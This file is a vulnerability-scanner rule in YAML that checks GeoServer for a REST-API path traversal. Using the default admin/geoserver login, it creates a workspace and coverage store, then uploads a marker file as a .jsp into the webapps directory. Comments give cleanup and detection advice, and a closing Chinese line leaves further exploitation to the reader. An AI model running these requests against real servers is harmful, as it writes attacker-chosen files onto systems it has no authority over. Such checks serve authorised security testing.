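# Scanner check (xray-style YAML rule file) for a GeoServer REST API issue:
# the coverage-store file-upload endpoint accepts a `filename` query
# parameter containing `../`, so an authenticated REST user can write a file
# outside the store directory.
#
# NOTE(review): the published listing had lost all indentation. The nesting
# below is reconstructed from the key names; confirm the placement of `tips`
# against the consuming engine's schema.
#
# Side effects: a passing run creates a workspace and a coverage store, and
# writes a file on the target. Nothing in this file removes them, so clean up
# by hand after an authorised scan.
#
# Defensive notes:
#   * Every request sends `Authorization: Basic YWRtaW46Z2Vvc2VydmVy`, the
#     base64 form of GeoServer's default admin login (admin / geoserver).
#     The check therefore only succeeds where that default password is still
#     in place. Changing it and restricting /geoserver/rest to trusted
#     networks removes the precondition.
#   * For detection, look for REST requests to
#     .../coveragestores/<name>/file.* whose `filename` parameter contains
#     `..`, and for unexpected files appearing in the servlet container's
#     webapps directory.
detail:
  author: ""
  links:
    - x
  vulnerability:
    level: critical
  # Example values seen on the tested install (GeoServer 2.14.1 under /opt).
  tips: GEOSERVER_DATA_DIR=/opt/geoserver-2.14.1/data_dir | java.class.path=/opt/geoserver-2.14.1/resources
name: poc-yaml-geoserver-coveragestore-fileupload
manual: true
transport: http
set:
  # NOTE(review): s1, s2, reverse, reverseURL and fileContent are declared
  # but not referenced by any rule below. They are kept so the variable set
  # matches the published listing.
  s1: randomInt(1000000000, 9000000000)
  s2: randomLowercase(8)
  reverse: newReverse()
  reverseURL: reverse.url
  # Random names keep repeated runs from colliding on the target.
  workspaceName: randomLowercase(8)
  coverageStoreName: randomLowercase(8)
  fileName: randomLowercase(8)
  fileContent: randomLowercase(8)
rules:
  # Step 1: create a throw-away workspace. HTTP 201 means the supplied
  # credentials were accepted and the REST API is writable.
  createWorkspace:
    request:
      cache: true
      method: POST
      path: /geoserver/rest/workspaces.xml
      follow_redirects: false
      headers:
        Authorization: Basic YWRtaW46Z2Vvc2VydmVy
        Content-Type: application/xml
      body: <workspace><name>{{workspaceName}}</name></workspace>
    expression: response.status == 201
  # Step 2: read the status page and capture the directory that contains
  # data_dir (everything before "/data_dir" in GEOSERVER_DATA_DIR).
  getAbsolutePath:
    request:
      cache: true
      method: GET
      path: /geoserver/rest/about/status
      follow_redirects: false
      headers:
        Authorization: Basic YWRtaW46Z2Vvc2VydmVy
      # Explicit empty string instead of a bare key, which parses as null.
      body: ""
    expression: response.status == 200 && response.body_string.contains("GEOSERVER_DATA_DIR")
    output:
      search: |-
        "GEOSERVER_DATA_DIR=(?P<tmp>.*?)/data_dir".submatch(response.body_string)
      absoluteDataPath: search["tmp"]
  # Step 3: register an ImageMosaic coverage store that points at the
  # sample mosaic directory under the path captured in step 2.
  createCoverageStore:
    request:
      cache: true
      method: POST
      path: /geoserver/rest/workspaces/{{workspaceName}}/coveragestores.xml
      follow_redirects: false
      headers:
        Authorization: Basic YWRtaW46Z2Vvc2VydmVy
        Content-Type: application/xml
      body: <coverageStore><name>{{coverageStoreName}}</name><description>Italian sample mosaic</description><type>ImageMosaic</type><enabled>true</enabled><workspace><name>{{workspaceName}}</name></workspace><__default>false</__default><url>file://{{absoluteDataPath}}/data_dir/coverages/mosaic_sample</url></coverageStore>
    expression: response.status == 201
  # Step 4: upload a marker body with a `filename` that climbs out of the
  # store directory. HTTP 202 without the storage error string is taken as
  # evidence that the server accepted the traversal path.
  # NOTE(review): the relative path presumably relies on the install layout
  # shown in detail.tips; confirm on other layouts.
  uploadFile:
    request:
      cache: true
      method: POST
      path: /geoserver/rest/workspaces/{{workspaceName}}/coveragestores/{{coverageStoreName}}/file.geotiff?filename=../../../webapps/{{fileName}}.jsp
      follow_redirects: false
      headers:
        Authorization: Basic YWRtaW46Z2Vvc2VydmVy
        Content-Type: application/x-www-form-urlencoded
      # Quoted so the marker stays a string rather than a YAML integer.
      body: "123456"
    expression: response.status == 202 && !response.body_string.contains("Error while storing uploaded file")
# All four steps must succeed, in order, for the target to be reported.
expression: createWorkspace() && getAbsolutePath() && createCoverageStore() && uploadFile()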
看到有人问,就发出来了,至于后续的利用就自己去研究吧